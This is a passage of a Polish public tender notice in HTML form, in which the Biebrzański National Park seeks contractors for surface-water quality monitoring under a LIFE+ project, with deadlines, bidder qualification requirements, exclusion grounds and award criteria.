fizykochemicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021, należy złożyć do 7 grudnia 2021 r. do siedziby Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy.7.	Każdy raport roczny oraz końcowy należy dostarczyć w formie wydruku oraz na nośniku elektronicznym zapisanym w formacie edytowalnym ,,doc" oraz w formacie ,,pdf". Na stronie tytułowej raportu Wykonawca umieści logo Projektu, logo BbPN, logo mechanizmu finansowego LIFE+, logo Natura 2000 oraz logo NFOŚiGW - logotypy dostarczone przez Zamawiającego. W stopce raportu winny być umieszczone następujące informacje: Opracowanie powstało w ramach projektu LIFE13 NAT/PL/000050 ,,Renaturyzacja sieci hydrograficznej w Basenie Środkowym doliny Biebrzy. Etap II." współfinansowanego przez instrument finansowy LIFE+ Komisji Europejskiej, Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej oraz Biebrzański Park Narodowy.8.	Zgodnie z art. 29 ust. 3a ustawy ZamPublUZamawiający nie wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących prace fizyczne, które są niezbędne do wykonania przedmiotu zamówienia. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">73111000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-12-07</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zamawiający wymaga, aby cały przedmiot zamówienia opisany w rozdziale A i B został zrealizowany w terminie do 7 grudnia 2021 roku, z uwzględnieniem pośrednich terminów realizacji zamówienia tj. 1.	Raport roczny z przeprowadzonych badań za dany rok należy złożyć w następujących terminach tj. a)	raport roczny za 2019 rok do 30 listopada 2019 r. b)	raport roczny za 2020 rok do 30 listopada 2020 r. c)	raport roczny za 2021 rok do 30 listopada 2021 r. 2.	Raport końcowy należy dostarczyć do 7 grudnia 2021 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Rozdział A - monitoring elementów biologicznychZamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawcy zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę, zgodnie z treścią Załącznika nr 3 SIWZ.Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunku. Rozdział B - monitoring elementów fizykochemicznychZamawiający wymaga aby Wykonawca posiadał uprawnienia do podjęcia i wykonania działalności zgodnie z postanowieniami normy PN-EN ISO/IEC 17025:2005 potwierdzone posiadaniem aktualnej akredytacji Polskiego Centrum Akredytacji lub innego równoważnego ośrodka akredytacji w zakresie elementów fizykochemicznych wymienionych w Rozdziale B pkt. 1, ppkt. 5 Części II SIWZ.Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunku. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Rozdział A - monitoring elementów biologicznychZamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawcy zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę, zgodnie z treścią Załącznika nr 3 SIWZ.Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunku.Rozdział B - monitoring elementów fizykochemicznychZamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawcy zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę, zgodnie z treścią Załącznika nr 3 SIWZ.Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Rozdział A - monitoring elementów biologicznycha)	Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum dwie usługi, obejmujące badania jakości wód powierzchniowych w zakresie elementów biologicznych (np. fitoplanktoni/lubmakrofity i/lub fitobentos i/lub makrobezkręgowce bentosowe), o wartości nie mniejszej niż 10 000 zł brutto/ każda. W celu potwierdzenia warunku udziału w postępowaniu należy wykorzystać Załącznik nr 6 do SIWZ - Wykaz wykonanych usług.b)	Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwiema osobami zdolnymi do wykonania zamówienia tj. osobami, gdzie każda z nich posiada łącznie:- wykształcenie wyższe przyrodnicze na jednym z kierunków: biologia, ochrona środowiska, chemia lub inne pokrewne. - doświadczenie w realizacji monitoringu i/lub inwentaryzacji jednego z elementów biologicznych jakości wód (fitoplankton, makrofity, fitobentos, makrobezkręgowce bentosowe) - jako osoba wykonująca lub biorąca udział, potwierdzone co najmniej jednym opracowaniem specjalistycznym w tym zakresie (jako autor lub współautor). Przez opracowanie specjalistyczne Zamawiający rozumie wszelkie opracowania, t.j.: sprawozdania, raporty dokumentujące realizację monitoringu i/lub inwentaryzacji jednego z elementów biologicznych jakości wód (fitoplankton, makrofity, fitobentos, makrobezkręgowce bentosowe).W celu potwierdzenia warunku udziału w postępowaniu należy wykorzystać Załącznik nr 7 do SIWZ - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia. Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunku. Rozdział B - monitoring elementów fizykochemicznycha)	Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum dwie usługi, obejmujących badania jakości wód powierzchniowych w zakresie elementów fizykochemicznych, o wartości nie mniejszej niż 15 000 zł brutto/ każda. W celu potwierdzenia warunku udziału w postępowaniu należy wykorzystać Załącznik nr 6 do SIWZ - Wykaz wykonanych usług.b)	Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwiema osobami posiadającymi wykształcenie wyższe na jednym z kierunków: biologia, ochrona środowiska, chemia, inżynieria środowiska lub inne pokrewne. W celu potwierdzenia warunku udziału w postępowaniu należy wykorzystać Załącznik nr 8 do SIWZ - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia. Ocena spełnienia tego warunku dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunku. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ZamPublU;2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;4)	oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2018 r. poz. 1445) wg wzoru stanowiącego Załącznik nr 13 do SIWZ.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	Wykazu usług wykonanych w okresie ostatnich 3 lat przed terminem składania ofert, a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych;a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu zamówienia, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane wraz z załączonymi dowodami określającymi, czy te usługi zostały wykonane lub są wykonywane należycie; według wzoru stanowiącego Załącznik nr 6 do SIWZ. Dowodami są referencje bądź inne dokumenty wystawione przez podmioty, na rzecz których usługi były wykonane (a przypadku świadczeń okresowych lub ciągłych są wykonywane), a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze, Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż trzy miesiące przed upływem terminu składania ofert; 2)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, posiadania wymaganych uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami, według wzoru - Załącznik nr 7 do SIWZ (rozdział A)/ Załącznik nr 8 do SIWZ (rozdział B).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ZamPublU zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ZamPublU stanowiące Załącznik nr 12 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dokumenty bądź informacje, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z takich Wykonawców.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów:1)	o których mowa w ust. 7 pkt. 1-3 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, b)	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo, że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.Jeżeli Wykonawca polega na innym podmiocie na zasadach określonych w art. 22a ZamPublU, wraz z ofertą powinien złożyć zobowiązanie tego podmiotu lub inny dokument służący wykazaniu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, wg wzoru stanowiącego Załącznik nr 4 do SIWZ. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku podstaw ich wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, składa dokumenty dotyczące tych podmiotów, podpisane przez te podmioty a wymienione w części VIA ust. 7 pkt 1 - 4 SIWZ.Na wezwanie Zamawiającego Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ZamPublU zobowiązany jest do przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w części VIA ust. 7 pkt 1 - 4 SIWZ oraz właściwych dokumentów wskazanych w części VIA ust. 6 odpowiednio do udostępnianych zasobów. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, na etapie postępowania o udzielenie zamówienia publicznego składa Załącznik nr 11 do SIWZ oraz na wezwanie Zamawiającego dokumenty wymienione w części VIA ust. 7 pkt 1 - 4 SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena ryczałtowa brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin wykonania analiz laboratoryjnych (rozdzaił A) bądź liczba elementów fizykochemicznych jakości wód posiadajacych akredytację (Rozdział B)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> 